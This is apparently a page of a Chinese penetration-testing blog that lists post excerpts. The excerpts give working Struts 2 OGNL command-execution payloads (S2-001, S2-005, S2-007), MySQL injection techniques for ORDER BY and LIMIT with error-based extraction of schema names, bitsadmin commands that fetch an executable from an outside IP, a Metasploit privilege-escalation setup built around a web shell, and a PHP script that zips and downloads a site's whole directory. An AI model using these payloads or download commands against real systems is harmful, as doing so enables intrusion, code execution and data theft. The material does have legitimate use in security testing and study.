Struts 2 相关漏洞 payload
0x00 S2-001
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
0x01 S2-005
影响版本: 2.0.0 - 2.1.8.1
http://aa.com/index.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1
0x02 S2-007
影响版本: 2.0.0 - 2.2.3
当配置了验证规则 <ActionName>-validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '
0x03 S2-012
影响版本: 2.1.0 - 2.3.13
more...SQL注入 tips(MySQL)
环境:MySQL 5.5.47
0x00 注入点在Order by后面
mysql> select id,name,content from msg where id>1 order by id into outfile 'C:\\Apps\\phpStudy\\WWW\\a.txt';
Query OK, 1 row affected (0.01 sec)
mysql> select id,name,content from msg where id>1 order by updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~msg~'
mysql> select id,name,content from msg where id>1 order by name procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~rtest~'
mysql> select name from msg where id>1 order by if(1=1,1,(select 1 union select 2));
+----------+
| name |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by if(1=2,1,(select 1 union select 2));
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select name from msg where id>1 order by (select case when(2>1) then 1 else 1*(select 1 union select 2)end)=1;
+----------+
| name |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by (select case when(2<1) then 1 else 1*(select 1 union select 2)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
0x01 注入点在limit后面
- limit前面没有order by可以使用union、analyse()
mysql> select id,name,content from msg where id>1 limit 1,1 union select 1,2,3;
+----+------+---------+
| id | name | content |
+----+------+---------+
| 1 | 2 | 3 |
+----+------+---------+
1 row in set (0.01 sec)
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse();
+-------------------+---------------+---------------+------------+------------+
| Field_name | Min_value | Max_value | Min_length | Max_length |
+-------------------+---------------+---------------+------------+------------+
| rtest.msg.name | xiaohong | xiaohong | 8 | 8 |
| rtest.msg.content | I have a cat. | I have a cat. | 13 | 13 |
+-------------------+---------------+---------------+------------+------------+
------------------+-------+-------------------------+------+--------------------+
Empties_or_zeros | Nulls | Avg_value_or_avg_length | Std | Optimal_fieldtype |
------------------+-------+-------------------------+------+--------------------+
0 | 0 | 8.0000 | NULL | ENUM('xiaohong') NOT NULL |
0 | 0 | 13.0000 | NULL | ENUM('I have a cat.') NOT NULL|
------------------+-------+-------------------------+------+--------------------+
2 rows in set (0.00 sec)
- limit前面有order by则不可以使用union、analyse()
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
mysql> select id,name,content from msg where id>1 order by name limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
0x02 根据报错得到数据库名、表名、列名
#得到数据库名为rtest
mysql> select id,name,content from msg where id=2-a();
ERROR 1305 (42000): FUNCTION rtest.a does not exist
#得到表名为msg
mysql> select id,name,content from msg where id=2 and polygon(1);
ERROR 1367 (22007): Illegal non geometric '1' value found during parsing
mysql> select id,name,content from msg where id=2 and polygon(id);
ERROR 1367 (22007): Illegal non geometric '`rtest`.`msg`.`id`' value found during parsing
#得到列名为id、name、content、useragent
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b)c);
ERROR 1060 (42S21): Duplicate column name 'id'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id))c);
ERROR 1060 (42S21): Duplicate column name 'name'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name))c);
ERROR 1060 (42S21): Duplicate column name 'content'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content))c);
ERROR 1060 (42S21): Duplicate column name 'useragent'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content,useragent))c);
ERROR 1241 (21000): Operand should contain 1 column(s)
0x03 MySQL的隐式转换
官方隐式转换规则
more...
ThinkPHP5 的 where 函数使用不当存在注入
0x00 关于thinkphp5的where函数
年前公司委托别的公司开发一个网站,使用的是ThinkPHP 5.0.13,存在一个注入漏洞,分析后发现是因为tp5中的where函数使用不当,tp5中where这个函数可以接收字符串和数组这两种类型的参数来进行查询,而在用字符串这种传递方式时,如果使用不当的话就可能会出现sql注入。
more...WebLogic 反序列化漏洞 POC (CVE-2017-10271)
0x00 WebLogic WLS 组件反序列化漏洞
这个漏洞的编号是 CVE-2017-10271,漏洞存在于 Oracle WebLogic 的 wls-wsat 组件中,该组件的 XMLDecoder 方法在反序列化时存在漏洞可远程代码执行,凡是版本号 < 10.3.6 的都受到影响,刚出来时没有看,现在记录一下
more...Metasploit 简单提权
0x00 前提
虚拟机有一个shell:http://10.11.11.20/a.php,物理机IP是211.222.222.72
外网安装msf的主机:外网IP是114.115.123.123,内网IP是192.168.0.195
Windows 终端下载文件和执行远程文件
环境:Windows Server 2008 R2 Enterprise
0x00 bitsadmin下载文件
bitsadmin /rawreturn /transfer getfile http://114.115.123.123/a.exe C:\Windows\Temp\a.exe
bitsadmin /rawreturn /transfer getpayload http://114.115.123.123/a.zip C:\Windows\Temp\a.zip
bitsadmin /transfer myDownLoadJob /download /priority normal http://114.115.123.123/a.exe C:\Windows\Temp\a.exe
0x01 certutil下载文件
保存在当前目录
more...Python 中执行系统命令
打包下载 php 文件
0x00 代码如下
<?php
function addFileToZip($zip,$zipname,$path){
$handler = opendir($path);
while(($filename = readdir($handler))!==false) {
if($filename != "." && $filename != ".." && $filename!= $zipname){
if (is_dir($path."/".$filename)) { //如果读取的某个对象是文件夹,则递归
addFileToZip($zip,$zipname,$path."/".$filename);
} else {
$zip->addFile($path."/".$filename);
}
}
}
@closedir($path);
}
function tar($zipname,$path) {
$zip = new ZipArchive(); //使用本类,linux需开启zlib,windows需取消php_zip.dll前的注释
if ($zip->open($zipname, ZipArchive::OVERWRITE) === TRUE) {
addFileToZip($zip,$zipname,$path);$zip->close();
} else {
exit('Unable to open file, or file creation failed!');
}
}
function download($zipname) {
if(!file_exists($zipname)){
exit("Zip file does not exist!");
}
header("Cache-Control: public");
header("Content-Description: File Transfer");
header('Content-disposition: attachment; filename='.basename($zipname)); //文件名
header("Content-Type: application/zip"); //zip格式的
header("Content-Transfer-Encoding: binary"); //告诉浏览器,这是二进制文件
header('Content-Length: '. filesize($zipname)); //告诉浏览器,文件大小
@readfile($zipname);
unlink($zipname);
}
$zipname = 'bak.zip';
$path = '.';
tar($zipname,$path);
download($zipname);
?>
Reference(侵删):
XXE 漏洞
Previous Page
4 of 18
Next Page